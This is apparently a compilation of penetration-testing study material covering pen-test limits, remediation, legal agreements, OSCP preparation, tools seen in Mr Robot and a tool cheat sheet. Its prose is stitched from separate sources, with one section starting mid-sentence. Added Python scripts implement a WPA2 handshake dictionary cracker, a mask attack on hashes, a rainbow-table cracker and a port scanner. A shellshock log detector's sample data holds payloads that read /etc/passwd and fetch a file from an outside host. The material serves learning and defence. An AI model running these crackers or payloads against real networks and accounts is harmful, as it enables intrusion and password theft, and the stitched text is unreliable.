Limitation of Scope − Many organizations do not test everything, because of their own
limitations, including resource, security and budget constraints. The tester therefore has a
limited scope and has to leave out many parts of the system that might be much more
vulnerable and a perfect niche for the attacker.
Limitation on Access − Testers often have restricted access to the target environment. For
example, a company may have its DMZ systems tested only from its internal networks, while
the real attacker comes in through the normal internet gateway.
Limitation of Methods − There is a chance the target system will crash during a penetration
test, so certain attack methods are taken off the table for a professional penetration tester. For
example, producing a denial-of-service flood to divert the system or network administrator
from another attack is often an ideal tactic for a real attacker, but it is likely to fall outside the
rules of engagement for most professional penetration testers.
Limitation of the Tester's Skill Set − Professional penetration testers are limited by their own
skills, whatever their expertise and past experience. Most are focused on a particular
technology and have less knowledge of other fields.
Limitation of Known Exploits − Many testers are aware only of exploits that are public.
Attackers may think well beyond a tester's assumptions and discover new flaws to attack.
Limitation to Experiment − Most testers are time bound and follow the instructions given to
them by their organization or seniors; they do not try something new or think beyond the
given instructions. Attackers, on the other hand, are free to think, experiment, and create new
paths to attack.
Moreover, penetration testing can neither replace routine IT security tests nor substitute for a
general security policy; rather, it supplements the established review procedures and discovers
new threats.
ensure an exhaustive discovery of every instance where a security control's effectiveness is
insufficient. Identifying a cross-site scripting vulnerability in one area of an application does not
necessarily expose all instances of that vulnerability in the application. This chapter illustrates
the concept and utility of remediation.
What is Remediation?
Remediation is the act of correcting a mistake and setting it right. Often the presence of a
vulnerability in one area indicates a weakness in process or development practices that could
have produced a similar vulnerability elsewhere. Therefore, while remediating, it is important
to carefully investigate the tested entity or application with ineffective security controls in mind.
For these reasons, the company should take steps to remediate any exploitable vulnerability
within a reasonable period of time after the original penetration test. As soon as the company
has completed these steps, the pen tester should perform a retest to validate that the newly
implemented controls actually mitigate the original risk.
If remediation efforts extend for a long period after the initial pen test, a new testing
engagement may be required to ensure the results reflect the current environment. This
determination should be made after a risk analysis of how much change has occurred since the
original testing was completed.
Moreover, in specific conditions the flagged security problem may reveal a basic flaw in the
environment or application. The scope of a retest should therefore consider whether any changes
made during remediation are classified as significant. All changes should be retested; whether an
entire system retest is necessary is determined by the risk assessment of the changes.
Before allowing someone to test sensitive data, companies normally take measures regarding the
availability, confidentiality, and integrity of that data. For this agreement to be in place, legal
compliance is a necessary activity for the organization.
The most important legal considerations to observe when establishing and maintaining security
and authorization systems are presented below in the context of penetration tests.
What are the Legal Issues?
Following are some of the issues which may arise between a tester and his client −
The tester is unknown to the client, so on what grounds should he be given access to
sensitive data?
Who guarantees the security of the data, and who is liable if it is lost?
The client may blame the tester for a loss of data or confidentiality.
Penetration testing may affect system performance and can raise confidentiality and integrity
issues. It is therefore very important, even for an internal penetration test performed by internal
staff, to get permission in writing. There should be a written agreement between the tester and
the company/organization/individual that clarifies all points regarding data security, disclosure,
etc. before testing commences.
A statement of intent should be drawn up and duly signed by both parties prior to any testing
work. It should clearly outline the scope of the job and what you may and may not do while
performing vulnerability tests.
For the tester, it is important to know who owns the business or systems he is being asked to
work on, and which infrastructure between the testing systems and their targets may potentially
be affected by the pen test. The idea is to make sure that;
the tester has permission in writing, with clearly defined parameters;
the company has the details of its pen tester and an assurance that he will not leak any
confidential data.
A legal agreement benefits both parties. Remember that regulations change from country to
country, so keep yourself abreast of the laws of your respective country, and sign an agreement
only after considering them.
Many beginners don't understand that hacking or penetration testing follows a very logical
process which, when broken down, really clarifies tasks and goals. During this write-up I will use
a fake company as an example and use very general examples of how each step is completed.
Our target will be a fake company called SillyVictim, and all we know is that they have a
webpage and an internal company network. Our goal is to infiltrate this company and obtain
admin privileges. I'll be using my Metasploitable and Kali VMs from my previous lesson as
examples of how to apply this methodology.
Before you can take the OSCP exam, you are required to take the Penetration Testing
with Kali (PWK) course. Taking the course is mandatory for you to become eligible
to take the OSCP. In addition to the knowledge you gain from the course, it opens
doors to several career opportunities in information security. Of course, those who
pass get bragging rights too.
1. Linux and Windows Environment - You need to be familiar with both. These will help
you spot clues for privilege escalation. I’m a Windows guy and during the labs, I learned
Linux the hard way.
2. Linux and Windows Commands - Knowing Linux and Windows commands helps a lot.
Brush up on them!
3. Basic Programming Skills - Expect to debug and rewrite exploits, so know Bash
Scripting. This will help you to automate redundant tasks.
4. Web application attacks (SQLi, XSS, Local File Inclusion, Remote File Inclusion, and
Command Execution) - Expect a lot of web application content in the labs. Also, practice
bypassing web security filters for injection attacks.
5. Metasploit Framework – Brush up on creating payloads with different formats, using
multi handlers, and using staged vs non-staged payloads. Knowing these things will save
you some time during your exam.
6. Nmap - Different scanning techniques and Nmap NSE Scripts will help you a lot during
your lab or exam.
7. Netcat and Ncat - You’ll be using these a lot during the OSCP.
8. Wireshark and tcpdump - Those are important because you’ll be using Wireshark to
debug your exploit - or tcpdump, when machines don’t have a GUI.
9. Windows and Linux Privilege Escalation - Aside from using kernel exploits, brush up
on misconfigurations like weak service/file permissions and NFS/Shares.
10. Escaping restricted shells and spawning shells - You’ll encounter these a lot during
your OSCP.
11. File transfer - It is important that you know the different techniques to transfer files to a
target machine.
Exploring the Hacker Tools of Mr Robot
Over the years the most famous hacking tool to make it into the movies is Nmap. When the
producers of a movie actually try to put a dose of reality into the computer hacking scenes, Nmap
will often flash up on the screen. AFAIK Trinity in The Matrix was the first. Nmap has also
appeared in Elysium, The Bourne Ultimatum, Die Hard 4 and many others.
The debut season of Mr Robot has received a nod from the security focused twitters for its
attempts at trying to keep things for the most part realistic. In the episodes so far we have seen
hacker types communicating using IRC, there are Linux boxes as far as the eye can see and the
main character wears a hoodie. Of course it is a television show that has to be entertaining so we
have to give them some slack in getting a bit creative. So far they seem to be doing a pretty good
job at maintaining a balance between the story and what is technically possible.
Here is a quick overview of some of the tools that have appeared in the show so far.
Kali Linux
In multiple scenes we can see references to the Kali Linux distribution, a complete
operating system that has been packaged with configured and ready to use penetration
testing (hacking) tools. If you are interested in learning about network security, get a
copy of this and start playing! ** Only in your lab network of course! Breaking into
computers you do not own is illegal in most parts of the world **.
Wget
Wget is a terminal program that makes HTTP requests; a popular use case is simply
downloading the source of a web page or grabbing a file from a web server in a terminal.
Here this handy tool is used to compromise a system using one of the big vulnerabilities of
2014, the shellshock bug. You can see the command being sent in the User-Agent of the request
to the web server; the command in the screenshot is simply cat /etc/passwd.
While success was achieved here in retrieving the /etc/passwd file, on a modern system that file
holds no password hashes: they live in /etc/shadow, which is readable only by root. Without
/etc/shadow, the next line, where John the Ripper is launched, is never going to work.
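The User-Agent trick shown above is easy to spot in web server logs after the fact. The following Python script is an added example (not from the show, and not code from the original page) that parses Apache combined-format log lines and flags requests whose User-Agent or Referer carries the shellshock function-definition prefix, extracting the command bash would have executed. It goes slightly beyond the screenshot by checking the Referer header as well, since any CGI environment variable works as the carrier. The log lines are constructed for the example and use documentation IP ranges.

```python
import re
from typing import Dict, List, Optional

# Constructed sample log lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2015:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/cat /etc/passwd"
203.0.113.7 - - [10/Oct/2015:13:55:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /usr/bin/wget http://198.51.100.9/x -O /tmp/x"
198.51.100.23 - - [10/Oct/2015:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64) Wget/1.16"
192.0.2.44 - - [10/Oct/2015:13:57:12 +0000] "GET /cgi-bin/env.cgi HTTP/1.1" 500 0 "() { ignored; }; echo vulnerable" "curl/7.38.0"
"""

# Combined log format: the last two quoted fields are Referer and User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The shellshock trigger: an exported function definition "() { ... }" followed by the
# trailing text that a vulnerable bash executed when it imported the variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)$')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_shellshock(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per header (Referer or User-Agent) that carries a shellshock payload."""
    findings: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("referer", "ua"):
            m = SHELLSHOCK_RE.search(rec[field])
            if m:
                findings.append({
                    "ip": rec["ip"],
                    "request": rec["request"],
                    "field": field,
                    "command": m.group("cmd").strip(),
                })
    return findings


if __name__ == "__main__":
    for f in detect_shellshock(SAMPLE_LOG):
        print(f"{f['ip']} {f['request']} via {f['field']}: {f['command']}")
```

The same pattern applied to the Cookie or Host header catches the other common carriers; the giveaway is always the `() {` prefix at the start of a header value, which no legitimate client sends.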
Canbus Hacking
Car hacking has really hit the big time recently after computer security researchers
remotely hacked into and took control of a Jeep as it was driving down the freeway.
Canbus hacking has been around for a number of years, and both car enthusiasts and
security researchers have been poking around to gain access to the computers that
control the modern car.
In the screenshot from Mr Robot we can see candump, one of the Linux can-utils programs
used for viewing canbus messages.
In this scene we see one of the few Windows desktops shown: a security guard inserts a
USB drive found in the car park into his system, infecting his Windows XP machine with
malware. Leaving infected USB flash drives in the car park of the target organization is a
well known trick to get code onto a system where network access is limited. In this instance
the malware is caught by Avast anti-virus.
Bluetooth Scanner (btscanner)
btscanner is used here to probe the target's phones for bluetooth capabilities. The tool
attempts to extract as much information as possible from a Bluetooth device without
having to pair. The btscanner program is included in the Kali Linux distribution, and
we can see from the title bar of the window that Kali is the operating system being used
here.
Bluesniff
In this screenshot bluesniff can be seen; this is another tool for attacking bluetooth
enabled devices. The actual plan here is to perform a man in the middle attack against
the target's bluetooth keyboard. With keyboard access the next move is to drop a
Meterpreter shell onto the system for access to the target network.
In this shot we can see a few lines from a Meterpreter shell. Anyone who has used this
tool knows a little bit of Meterpreter goes a long way, so there was no need for an
extensive shot of this powerful tool. Part of the Metasploit penetration testing
framework by Rapid7, a Meterpreter shell gives an attacker full control of the target
system as well as the ability to move around the network.
Social Engineer Toolkit (SET)
The Social Engineer Toolkit, or SET, is a framework that makes setting up social
engineering attacks easier. Email based spear phishing attacks, fake websites and
wireless access points can all be launched through its menu system. In this case they
are using the SMS spoofing module.
Windows 95 and Netscape Navigator are mentioned when the lead character is
thinking about his first steps as a hacker. In the screenshot you can see the source
being viewed... careful, if you see someone viewing the source they are no doubt a
dangerous hacker. The humble web browser is actually a very useful tool for an
attacker, whether they are launching web application attacks or researching LinkedIn
for social engineering attacks.
Penetration testing tools cheat sheet: a quick reference, high level overview for typical penetration
testing engagements, covering the typical commands you would run when performing a
penetration test. For more in-depth information I'd recommend the man page for the tool or a
more specific pen testing cheat sheet.
The focus of this cheat sheet is infrastructure / network penetration testing; web application
penetration testing is not covered here apart from a few sqlmap commands at the end and some
web server enumeration. For web application penetration testing, check out The Web
Application Hacker's Handbook; it is excellent for both learning and reference.
Penetration Testing Tools Cheat Sheet
Contents
John the Ripper
Cain and Abel (software)
Aircrack-ng
Hashcat
Metasploit
  msfconsole
  msfgui
Ophcrack
Nmap
RainbowCrack
Wireshark
L0phtCrack
Burp suite
Nessus
Nikto Web Scanner
Ettercap (software) − Ettercap is a free and open source network security tool for man-in-the-middle
attacks on a LAN. It can be used for computer network protocol analysis and security auditing. It
runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on
Microsoft Windows.
Maltego
BackTrack
sqlmap
Armitage (computing)
OpenVAS
John the Ripper
John the Ripper is a fast password cracker for UNIX/Linux and Mac OS X. Its primary
purpose is to detect weak Unix passwords, though it supports hashes for many other
platforms as well.
Cain and Abel (software)
UNIX users often smugly assert that the best free security tools support their platform
first, and Windows ports are often an afterthought. They are usually right, but Cain &
Abel is a glaring exception. This Windows-only password recovery tool handles an
enormous variety of tasks. It can recover passwords by sniffing the network, crack
encrypted passwords using dictionary, brute-force and cryptanalysis attacks, record
VoIP conversations, decode scrambled passwords, reveal password boxes, uncover
cached passwords and analyse routing protocols.
Aircrack-ng
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and
WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any
wireless network interface controller whose driver supports raw monitoring mode and
can sniff 802.11a, 802.11b and 802.11g traffic. The program runs under Linux, FreeBSD,
OS X, OpenBSD, and Windows; the Linux version is packaged for OpenWrt and has also
been ported to the Android, Zaurus PDA and Maemo platforms; and a proof of concept
port has been made to the iPhone.
Name − Description
aircrack-ng − Cracks WEP keys using the Fluhrer, Mantin and Shamir (FMS) attack, the PTW
attack and dictionary attacks, and WPA/WPA2-PSK using dictionary attacks.
airdecap-ng − Decrypts WEP or WPA encrypted capture files with a known key.
airmon-ng − Places different cards in monitor mode.
airodump-ng − Packet sniffer: places air traffic into pcap or IVS files and shows information
about networks.
packetforge-ng − Creates encrypted packets for injection.
airdecloak-ng − Removes WEP cloaking from pcap files.
airolib-ng − Stores and manages ESSID and password lists and computes Pairwise Master Keys.
easside-ng − A tool for communicating with an access point without the WEP key.
wesside-ng − Automatic tool for WEP key recovery.
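To show what airolib-ng and aircrack-ng actually compute when cracking WPA/WPA2-PSK, here is an added Python example; it is not code from the aircrack-ng suite or from the original page. It derives the Pairwise Master Key with PBKDF2-HMAC-SHA1 (4096 rounds, the ESSID as salt), expands it into the PTK with the 802.11i PRF, and tests a candidate passphrase by recomputing the MIC of the second handshake message. The handshake material (MAC addresses, nonces, EAPOL frame) is constructed, with the "captured" MIC generated from a known passphrase so the script runs offline; the PMK for passphrase "password" and SSID "IEEE" is checked against the test vector from the 802.11i standard.

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional


def pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes).
    This is the expensive step, and the one airolib-ng precomputes per ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def ptk(pmk_bytes: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key: PMK plus the values an eavesdropper sees in the 4-way handshake."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk_bytes, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = first 16 bytes of HMAC-SHA1(KCK, frame with MIC zeroed)."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_wpa2(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
               eapol_frame: bytes, captured_mic: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack as aircrack-ng performs it: PMK -> PTK -> KCK -> MIC for every candidate."""
    for word in wordlist:
        kck = ptk(pmk(word, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return word
    return None


def precompute_pmks(ssid: str, wordlist: Iterable[str]) -> Dict[str, bytes]:
    """airolib-ng's idea: pay the PBKDF2 cost once per (ESSID, word) and reuse it for every capture of that ESSID."""
    return {word: pmk(word, ssid) for word in wordlist}


# Constructed handshake material (not a real capture).
SSID = "labnet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
# EAPOL-Key message 2 with its MIC field zeroed; the byte layout is only indicative of a real frame.
EAPOL_FRAME = bytes.fromhex("0103005f02010a00") + bytes(8) + SNONCE + bytes(32) + b"\x00\x00"
TRUE_PASSPHRASE = "correct horse"
CAPTURED_MIC = eapol_mic(ptk(pmk(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16], EAPOL_FRAME)
WORDLIST = ["password", "letmein", "correct horse", "hunter2"]

if __name__ == "__main__":
    print("PMK(password, IEEE) =", pmk("password", "IEEE").hex())
    print("recovered:", crack_wpa2(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_FRAME, CAPTURED_MIC, WORDLIST))
```

Two things follow directly from the code: the PMK depends on the ESSID, so a precomputed table is only useful against networks with that exact name (which is why default SSIDs are the ones worth precomputing), and the 4096 PBKDF2 rounds are the whole cost of the attack, so wordlist quality matters far more than raw speed.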
Hashcat
Hashcat is a powerful utility for recovering passwords from hashes. It supports over 200
hash algorithms and can use CPUs, GPUs and other hardware accelerators.
Hashcat offers multiple attack modes for obtaining effective and complete coverage of a hash's
keyspace. These modes are:
Brute-force attack[5]
Combinator attack[6]
Dictionary attack[7]
Fingerprint attack
Hybrid attack[8]
Mask attack[9]
Permutation attack
Rule-based attack[10]
Table-Lookup attack (CPU only)
Toggle-Case attack[11]
PRINCE attack[12] (in CPU version 0.48 and higher only)
The traditional brute-force attack is considered outdated, and the hashcat core team recommends
the mask attack as a full replacement: instead of trying every character in every position, a mask
fixes a character class per position (for example ?u?l?l?l?l?l?d?d for an initial capital, five
lowercase letters and two digits), so the keyspace shrinks to the patterns people actually use.
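The difference between a brute-force keyspace and a mask keyspace is easiest to see by computing both. The following Python script is an added example (not hashcat's code, and not from the original page) that expands hashcat-style masks using hashcat's built-in charsets (?l ?u ?d ?s ?a), counts the candidates a mask produces, compares that with full brute force over the 95 printable characters, and runs a small mask attack against an unsalted SHA-256 hash. The target strings are made up for the example.

```python
import hashlib
import itertools
import string
from typing import Dict, List, Optional

# hashcat's built-in charsets: ?l ?u ?d ?s, and ?a = all four together (95 printable ASCII characters)
CHARSETS: Dict[str, str] = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]


def parse_mask(mask: str) -> List[str]:
    """Expand a mask into one string of candidate characters per position.
    ?l ?u ?d ?s ?a select a charset, ?? is a literal '?', any other character stands for itself."""
    positions: List[str] = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            key = mask[i + 1]
            positions.append("?" if key == "?" else CHARSETS[key])
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def keyspace(mask: str) -> int:
    """Number of candidates the mask generates: the product of the charset sizes per position."""
    n = 1
    for chars in parse_mask(mask):
        n *= len(chars)
    return n


def brute_force_keyspace(max_len: int, charset: str = CHARSETS["a"]) -> int:
    """Classic brute force: every string of length 1..max_len over the full printable set."""
    return sum(len(charset) ** n for n in range(1, max_len + 1))


def hash_hex(plaintext: str, algo: str = "sha256") -> str:
    return hashlib.new(algo, plaintext.encode()).hexdigest()


def mask_attack(target_hex: str, mask: str, algo: str = "sha256") -> Optional[str]:
    """Walk the mask's keyspace in order and return the first candidate whose hash matches."""
    for combo in itertools.product(*parse_mask(mask)):
        candidate = "".join(combo)
        if hash_hex(candidate, algo) == target_hex:
            return candidate
    return None


if __name__ == "__main__":
    print("?u?l?l?l?l?l?d?d :", f"{keyspace('?u?l?l?l?l?l?d?d'):,}")
    print("brute force <= 8 :", f"{brute_force_keyspace(8):,}")
    print("recovered        :", mask_attack(hash_hex("Cat42"), "?u?l?l?d?d"))
```

An eight-character mask such as ?u?l?l?l?l?l?d?d yields about 3.1e10 candidates, while brute forcing all printable strings up to eight characters is about 6.7e15; the mask wins by five orders of magnitude precisely because it encodes how people build passwords.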
Metasploit
The Metasploit Project is a computer security project that provides information
about security vulnerabilities and aids in penetration testing and IDS
signature development.
Its best-known sub-project is the open-source[2] Metasploit Framework, a tool for
developing and executing exploit code against a remote target machine. Other important
sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project also offers tools for automating the comparison of a program's
vulnerability and its repaired (patched) version, and it is well known for its anti-forensic
and evasion tools, some of which are built into the Metasploit Framework. It is a very
powerful tool, and it comes pre-installed in Kali Linux.
The Metasploit Framework (MSF) is a software platform for developing, testing, and
executing exploits. It can be used to create security testing tools and exploit modules and
also as a penetration testing system. It provides the ability to launch exploits against
selected target systems and to perform post-exploitation tasks, such as uploading files,
running processes, establishing backdoor network connections, monitoring system use, and
many more. Its primary use is therefore in the penetration testing process.
Another important use of the MSF is in systems administration. Historically, the development
of exploits has been limited to a select group of people within the security research,
hacking and testing communities. With a reliable exploitation platform like Metasploit,
administrators are able to check multiple servers for vulnerability to a given exploit and,
what's more, can even run the exploit to determine whether the systems are indeed vulnerable.
msfconsole
The msfconsole (see Figure 1) is probably the most popular interface to the MSF. It
provides an “all-in-one” centralised console. It is the traditional and primary means of
using the MSF, and is the only supported way to access most of the features of
Metasploit. It is the most stable MSF Interface. After installation, launch it by
running ./msfconsole (from within the directory where it has been installed).
Figure 1: The user interface of msfconsole
msfgui
msfgui is, as the name implies, the graphical user interface of the framework. It is a good
tool for demonstrations to clients and management; it provides a point-and-click interface
for exploitation, and a GTK wizard-based interface to use the MSF.
Ophcrack
Ophcrack is a free open-source (GPL licensed) program that cracks Windows log-in
passwords by looking up LM hashes in rainbow tables. The program includes the ability
to import the hashes from a variety of formats, including dumping directly from the SAM
files of Windows. On most computers, ophcrack can crack most passwords within a few
minutes.[1]
Rainbow tables for LM hashes are provided for free by the developers. By default,
ophcrack is bundled with tables that allow it to crack passwords no longer than 14
characters using only alphanumeric characters. Available for free download are four
Windows XP tables and four Windows Vista tables.[2] Note that the LM hash (which
uppercases the password and splits it into two independent 7-character halves) is only
stored by default on Windows XP and earlier; Vista and later store only the NT hash,
which is what the Vista tables target.
Ophcrack in its LiveCD form (currently at v3.6.0) is a very convenient way to recover a
Windows password: its nearly fool-proof operation, automatic password recovery, and
overall speed put it in a league of its own. The LiveCD requires some preparation, but after
just a few minutes of running the software, Ophcrack will display on screen any Windows
passwords its tables cover.
Nmap
Nmap (Network Mapper) is a free and open-source network scanner created by Gordon
Lyon (also known by his pseudonym Fyodor Vaskovich).[3] Nmap is used to
discover hosts and services on a computer network by sending packets and analyzing the
responses.
Nmap provides a number of features for probing computer networks, including host
discovery and service and operating system detection. These features are extensible
by scripts that provide more advanced service detection,[4] vulnerability detection,[4] and
other features. Nmap can adapt to network conditions
including latency and congestion during a scan.
Nmap started as a Linux utility[5] and was ported to other systems
including Windows, macOS, and BSD.[6] Linux is the most popular platform, followed by
Windows.[7]
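To make concrete what "sending packets and analyzing the responses" means, here is an added Python example, not part of Nmap and not from the original page. It performs the unprivileged TCP connect scan (the equivalent of nmap -sT; Nmap's default SYN scan needs raw sockets and therefore root) and grabs a service banner, which is the simplest form of service detection. It starts a constructed fake SSH-like daemon on 127.0.0.1 so the whole thing runs offline; the banner string is made up.

```python
import socket
import threading
from typing import Dict, Iterable, List


def connect_scan(host: str, ports: Iterable[int], timeout: float = 0.5) -> List[int]:
    """TCP connect scan: complete the three-way handshake on each port.
    connect_ex() == 0 means a listener accepted; ECONNREFUSED means closed; a timeout means filtered."""
    open_ports: List[int] = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host: str, port: int, timeout: float = 1.0) -> bytes:
    """Simplest service detection: connect and read whatever the daemon volunteers (SSH, SMTP and FTP all talk first)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        try:
            return s.recv(256)
        except socket.timeout:
            return b""


class FakeService:
    """Constructed stand-in for a real daemon: listens on a kernel-chosen loopback port and greets every client."""

    def __init__(self, banner: bytes) -> None:
        self.banner = banner
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))   # port 0: let the kernel pick a free port
        self.sock.listen(5)
        self.sock.settimeout(0.2)           # lets the accept loop notice close()
        self.port = self.sock.getsockname()[1]
        self.running = True
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self) -> None:
        while self.running:
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            with conn:
                try:
                    conn.sendall(self.banner)
                except OSError:
                    pass

    def close(self) -> None:
        self.running = False
        self.sock.close()


def free_port() -> int:
    """Reserve-and-release a port so the scan also has a port that is known to be closed."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> Dict[str, object]:
    svc = FakeService(b"SSH-2.0-OpenSSH_6.7p1 Debian-5\r\n")   # constructed banner
    closed = free_port()
    try:
        found = connect_scan("127.0.0.1", [closed, svc.port])
        banner = grab_banner("127.0.0.1", svc.port) if svc.port in found else b""
    finally:
        svc.close()
    return {"service_port": svc.port, "closed_port": closed, "open": found, "banner": banner}


if __name__ == "__main__":
    r = demo()
    print(f"open ports: {r['open']} (expected [{r['service_port']}]), banner: {r['banner']!r}")
```

Because the connect scan completes the handshake, the target's application logs the connection; Nmap's SYN scan avoids that by never sending the final ACK, which is the reason it is the default when you have the privileges for it.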
RainbowCrack
RainbowCrack is a computer program that generates rainbow tables and uses them for
password cracking. It differs from "conventional" brute-force crackers in that it relies on
large precomputed tables (rainbow tables) to cut the time needed to crack a hash
drastically.[1] RainbowCrack was developed by Zhu Shuanglei and implements the improved
time-memory trade-off attack that originated in Philippe Oechslin's work on Ophcrack.[1]
A traditional brute-force cracker hashes every candidate plaintext one by one at crack
time, which is slow for large password spaces. RainbowCrack moves that work to a one-off
precomputation: it hashes the candidates in advance, stores them compressed as chains in
rainbow tables, and at crack time only has to regenerate a few chains. Building the tables
takes a long time, but once they exist a lookup can be hundreds of times faster than a
brute-force run. Two caveats follow from the design: a table only covers the hash
algorithm, character set and length range it was built for, and any salted hash defeats
precomputation, because each salt value would need its own table.
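The time-memory trade-off described above, as an added example in Python that is not RainbowCrack's own code: chains are built from a reduction function that maps a digest back into the password space, only each chain's start and end points are stored, and a lookup walks the target hash forward to an end point and then regenerates that one chain. The password space (three lowercase letters), the hash (unsalted MD5) and the table sizes are toy assumptions chosen so it runs in a second.

```python
import hashlib

CHARSET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 3            # toy space: 26**3 = 17,576 passwords
CHAIN_LEN = 50        # hashes per chain: the "time" side of the trade-off
NUM_CHAINS = 400      # chains stored:  the "memory" side of the trade-off


def H(password: str) -> bytes:
    """The hash being attacked (unsalted MD5 here; LM/NTLM are unsalted too)."""
    return hashlib.md5(password.encode()).digest()


def R(digest: bytes, column: int) -> str:
    """Reduction function: map a digest back into the password space. The column
    index is mixed in so every column uses a different reduction, which is what
    distinguishes a rainbow table from Hellman's original chains and limits
    chain merges."""
    n = int.from_bytes(digest, "big") ^ column
    chars = []
    for _ in range(PW_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def walk(start: str, steps: int) -> str:
    """Return the password at position `steps` of the chain beginning at `start`."""
    pw = start
    for col in range(steps):
        pw = R(H(pw), col)
    return pw


def build_table() -> dict:
    """Precompute NUM_CHAINS chains; only (endpoint -> start) is stored, so the
    table holds 2*NUM_CHAINS strings while covering up to NUM_CHAINS*CHAIN_LEN."""
    table = {}
    for i in range(NUM_CHAINS):
        start = R(H("seed-%d" % i), 0)       # deterministic pseudo-random start
        table[walk(start, CHAIN_LEN)] = start
    return table


def crack(table: dict, target: bytes):
    """Look a digest up in the table. For each column the target could occupy,
    walk to the chain end and, on an endpoint hit, regenerate that chain to
    recover the plaintext. Endpoint hits that do not contain the target are
    false alarms caused by merged chains and are skipped."""
    for col in range(CHAIN_LEN - 1, -1, -1):
        pw = R(target, col)
        for c in range(col + 1, CHAIN_LEN):
            pw = R(H(pw), c)
        start = table.get(pw)
        if start is not None:
            candidate = walk(start, col)
            if H(candidate) == target:
                return candidate
    return None


if __name__ == "__main__":
    table = build_table()
    secret = walk(table[next(iter(table))], 7)   # a password we know is covered
    print("table:", len(table), "chains; cracked:", crack(table, H(secret)))
```

The lookup costs at most CHAIN_LEN*(CHAIN_LEN+1)/2 hash operations regardless of how many chains are stored, which is the speed-up; the price is that coverage is probabilistic (merged chains overwrite each other here) and that a salted hash would need a separate table per salt.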
Wireshark
Wireshark is a free and open-source packet analyzer (also called a protocol analyzer or
network sniffer), available from the Wireshark website. It is used for network
troubleshooting, analysis, software and communications protocol development, and
education. It dissects the structure of network protocols layer by layer and so is a good
way to see encapsulation (Ethernet carrying IP, IP carrying TCP or UDP, and so on).
Wireshark shares many characteristics with tcpdump; the difference is that it adds a
graphical user interface and rich display filtering, and it shows all traffic passing the
capture interface, not only traffic addressed to the host (the interface is put into
promiscuous mode).
Data is analyzed either live from the wire or from capture files recorded earlier.
Main features:
Live capture and analysis on a wide range of link types (including Ethernet, IEEE 802.11,
Point-to-Point Protocol (PPP) and loopback).
Captured data can be browsed in the GUI or with the command-line version, tshark.
Capture files can be edited and converted programmatically with command-line switches to
the editcap program.
Display filters select and organise what is shown (for example ip.addr == 10.0.0.5 or
tcp.port == 443).
New protocols can be dissected by writing plug-ins.
VoIP calls can be traced and reassembled from captured traffic.
